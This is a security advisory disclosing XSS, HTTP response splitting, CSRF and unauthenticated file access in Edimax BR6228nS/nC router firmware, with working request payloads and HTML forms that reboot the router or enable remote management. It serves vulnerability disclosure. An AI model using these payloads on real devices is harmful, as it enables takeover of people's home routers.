# Title: Edimax BR6228nS/BR6228nC - Multiple vulnerabilities
# Date: 01.09.15
# Vendor: edimax.com
# Firmware version: 1.22
# Author: Smash_
# Contact: smash [at] devilteam.pl
 
Few vulnerabilities found in Edimax BR6228nS/BR6228nC router firmware.
 
 
1/ Cross Site Scripting
 
Request:
POST /goform/formWizSetup HTTP/1.1
Host: 192.168.0.10:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10:8080/main.asp
Cookie: language=0
Authorization: Basic YWRtaW46MTIzNA==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
 
setPage=x");alert("X&wizEnabled=1
 
Response:
HTTP/1.0 200 OK
Server: GoAhead-Webs
 
<html>
<body class="background" onLoad=document.location.replace("x");alert("X")></html>
 
 
 
2/ HTTP Response Splitting
 
Request:
POST /goform/formReflashClientTbl HTTP/1.1
Host: 192.168.0.10:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10:8080/stadhcptbl.asp
Cookie: language=0
Authorization: Basic YWRtaW46MTIzNA==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
 
submit-url=%2Fstadhcptbl.asp%0d%0aXXX%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert('X')</script>
 
Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Fri Nov 16 18:08:51 2012
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.0.10:8080/stadhcptbl.asp
XXX
Content-Length: 0
 
HTTP/1.1 200 OK
Content-Type: text/html
 
<script>alert('X')</script>
 
 
 
3/ Cross Site Request Forgery
 
Examples:
 
<html>
  <!-- Reboot -->
  <body>
    <form action="http://192.168.0.10:8080/goform/formReboot" method="POST">
      <input type="hidden" name="reset_flag" value="0" />
      <input type="hidden" name="submit-url" value="/tools.asp" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
 
  -
 
<html>
  <!-- Enable remote access -->
  <body>
    <form action="http://192.168.0.10:8080/goform/formReManagementSetup" method="POST">
      <input type="hidden" name="reManHostAddr" value="0.0.0.0" />
      <input type="hidden" name="reManPort" value="8080" />
      <input type="hidden" name="reMangEnable" value="ON" />
      <input type="hidden" name="submit-url" value="/system.asp" />
      <input type="hidden" name="" value="" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
 
 -
  
<html>
  <!-- XSS -->
  <body>
    <form action="http://192.168.0.10:8080/goform/formWizSetup" method="POST">
      <input type="hidden" name="setPage" value="x");alert("X" />
      <input type="hidden" name="wizEnabled" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
 
4/ Unprotected files
 
Following url's can be requested without http authorisation in order to obtain detail informations about router:
 
http://192.168.0.10:8080/FUNCTION_SCRIPT
http://192.168.0.10:8080/main.asp
 
Example:
 
devil@hell:~$ curl -ig http://192.168.0.10:8080/
HTTP/1.1 401 Unauthorized
Server: GoAhead-Webs
Date: Fri Nov 16 18:28:39 2012
WWW-Authenticate: Basic realm="Default: admin/1234"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
 
devil@hell:~$ curl -ig http://192.168.0.10:8080/FUNCTION_SCRIPT
HTTP/1.0 200 OK
Date: Fri Nov 16 18:28:47 2012
Server: GoAhead-Webs
Last-modified: Fri Nov 16 09:57:30 2012
Content-length: 997
Content-type: text/html
 
_DATE_="2012.11.16-17:51:47"
_VERSION_="1.22"
_MODEL_="BR6228GNS"
_MODE_="EdimaxOBM"
_PLATFORM_="RTL8196C_1200"
_HW_LED_WPS_="4"
_HW_LED_POWER_="6"
_HW_LED_WIRELESS_="2"
_HW_LED_USB_="17"
_HW_BUTTON_RESET_="5"
(...)